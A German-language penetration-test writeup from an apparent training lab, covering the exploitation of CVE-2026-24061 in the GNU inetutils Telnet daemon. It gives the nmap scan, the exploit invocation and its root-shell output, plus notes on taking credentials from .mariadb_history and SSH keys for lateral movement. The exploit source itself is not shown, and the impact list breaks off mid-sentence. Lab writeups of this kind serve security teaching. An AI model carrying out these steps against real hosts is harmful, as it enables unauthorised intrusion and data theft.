
Writeup/Fund von CVE-2026-24061 im Cyberhawks-Labor
Credit to: @SafeBreach-Labs
CVE: CVE-2026-24061
Labor: Cyberhawks Lab
Ziel: 10.1.1.1 (demo.cyberhawks.lab)
Finding-ID: WU-08
Datum: 2026-09-08
Schweregrad: Kritisch
Status: Bestätigt / Ausgenutzt
Während einer Bewertung der Cyberhawks-Lab-Umgebung wurde eine nicht authentifizierte Remote-Code-Ausführung (RCE)-Schwachstelle identifiziert und erfolgreich auf dem Zielhost (10.1.1.1) ausgenutzt. Die Ausnutzung von CVE-2026-24061 über einen exponierten Telnet-Dienst (TCP/23) führte zu einer interaktiven Shell mit Root-Rechten und gewährte vollständige administrative Kontrolle über das System.
| Feld | Wert |
|---|---|
| Ziel-IP | 10.1.1.1 |
| Ziel-Hostname | demo.cyberhawks.lab |
| Betriebssystem | Linux 6.12.41+deb13-amd64 (Debian 13) |
| Angreifer-OS | Parrot OS |
| Bewertungstyp | Penetrationstest (Lab-Umgebung) |
Ein Nmap-Dienstversionsscan wurde gegen das Ziel durchgeführt, um offene Ports und Dienste zu ermitteln.
Befehl:
nmap -sV 10.1.1.1
Ergebnisübersicht:
Bemerkenswerte Beobachtungen:
CVE-2026-24061 ist eine nicht authentifizierte Remote-Code-Ausführung-Schwachstelle, die die Telnet-Daemon-Komponente von GNU inetutils 2.6 betrifft. Die Ausnutzung ermöglicht es einem entfernten, nicht authentifizierten Angreifer, beliebige Befehle auf dem Zielsystem mit den Rechten des laufenden Dienstes auszuführen – in diesem Fall root.
Ein zweckgebundenes Python-Exploit-Skript (telnet_rce.py), das auf CVE-2026-24061 abzielt, wurde gegen den verwundbaren Telnet-Dienst ausgeführt.
Befehl:
python3 telnet_rce.py 10.1.1.1
Exploit-Ausgabe:
[*] Connected to 10.1.1.1:23
[*] Interactive session started. Use Ctrl+C to quit.
Linux 6.12.41+deb13-amd64 (demo.cyberhawks.lab) (pts/0)
root@demo:~#
Nach Erlangen einer Shell bestätigten die folgenden Befehle das erreichte Zugriffsniveau:
Identitätsprüfung:
root@demo:~# id
uid=0(root) gid=0(root) groups=0(root)
Dateisystem-Enumeration:
root@demo:~# ls -la
total 36
drwx------ 6 root root 4096 Aug 28 14:47 .
drwxr-xr-x 19 root root 4096 Aug 28 15:37 ..
-rw-r--r-- 1 root root 607 May 12 2025 .bashrc
drwx------ 4 root root 4096 Sep 6 2025 .cache
drwxr-xr-x 3 root root 4096 Sep 6 2025 .config
drwxrwxr-x 3 root root 4096 Sep 6 2025 .local
-rw------- 1 root root 261 Sep 6 2025 .mariadb_history
-rw-r--r-- 1 root root 132 May 12 2025 .profile
drwx------ 2 root root 4096 Sep 6 2025 .ssh
Dienstversions-Überprüfung
root@demo:~# telnet --version
telnet (GNU inetutils) 2.6
Copyright (C) 2025 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Written by many authors.
Wichtige Erkenntnisse nach der Ausnutzung:
.mariadb_history – deutet auf aktive MariaDB-Datenbanknutzung hin; Potenzial für weitere Anmeldedaten-Ernte oder Datenerfassung..ssh/-Verzeichnis – könnte private Schlüssel enthalten, die für laterale Bewegung zu anderen Hosts nutzbar sind.root-Zugriff (UID 0) wurde ohne erforderlichen Privilege-Escalation-Schritt bestätigt.| Kategorie | Bewertung |
|---|---|
| Vertraulichkeit | Kritisch – alle Daten auf dem System sind zugänglich |
| Integrität | Kritisch – der Angreifer kann beliebige Daten ändern oder zerstören |
| Verfügbarkeit | Kritisch – der Angreifer kann Dienste beenden oder das System zum Absturz bringen |
Eine vollständige Systemkompromittierung wurde in einem einzigen, nicht authentifizierten Schritt erreicht. Ein Angreifer mit Zugriff auf dieses Netzwerksegment könnte:
apt update && apt install inetutils-telnetd
| Artefakt | Beschreibung |
|---|---|
| Nmap-Scan-Ausgabe | Vollständige Port-/Dienst-Enumeration von 10.1.1.1 |
telnet_rce.py | Exploit-Skript, das zur Auslösung von CVE-2026-24061 verwendet wurde |
| Shell-Sitzungsprotokoll | Transkript der interaktiven Root-Shell |
Bericht erstellt für Cyberhawks Lab – nur für Bildungszwecke.
| Port | Status | Dienst |
|---|
| 21/tcp | Offen | FTP (tcpwrapped) |
| 22/tcp | Offen | SSH (tcpwrapped) |
| 23/tcp | Offen | Telnet |
| 25/tcp | Offen | SMTP (tcpwrapped) |
| 53/tcp | Offen | DNS (tcpwrapped) |
| 80/tcp | Offen | HTTP (tcpwrapped) |
| 110/tcp | Offen | POP3 (tcpwrapped) |
| 111/tcp | Offen | RPC (tcpwrapped) |
| 139/tcp | Offen | NetBIOS (tcpwrapped) |
| 143/tcp | Offen | IMAP (tcpwrapped) |
| 445/tcp | Offen | SMB (tcpwrapped) |
| 2049/tcp | Offen | NFS (tcpwrapped) |
| 3306/tcp | Offen | MySQL/MariaDB (tcpwrapped) |
| 3389/tcp | Offen | RDP (tcpwrapped) |
| 5901/tcp | Offen | VNC (tcpwrapped) |
| Feld | Detail |
|---|
| CVE | CVE-2026-24061 |
| Betroffener Dienst | Telnet (GNU inetutils 2.6, TCP/23) |
| Schwachstellentyp | Nicht authentifizierte Remote-Code-Ausführung (RCE) |
| CVSS-Score | Kritisch |
| Authentifizierung erforderlich | Keine |
| Benutzerinteraktion erforderlich | Keine |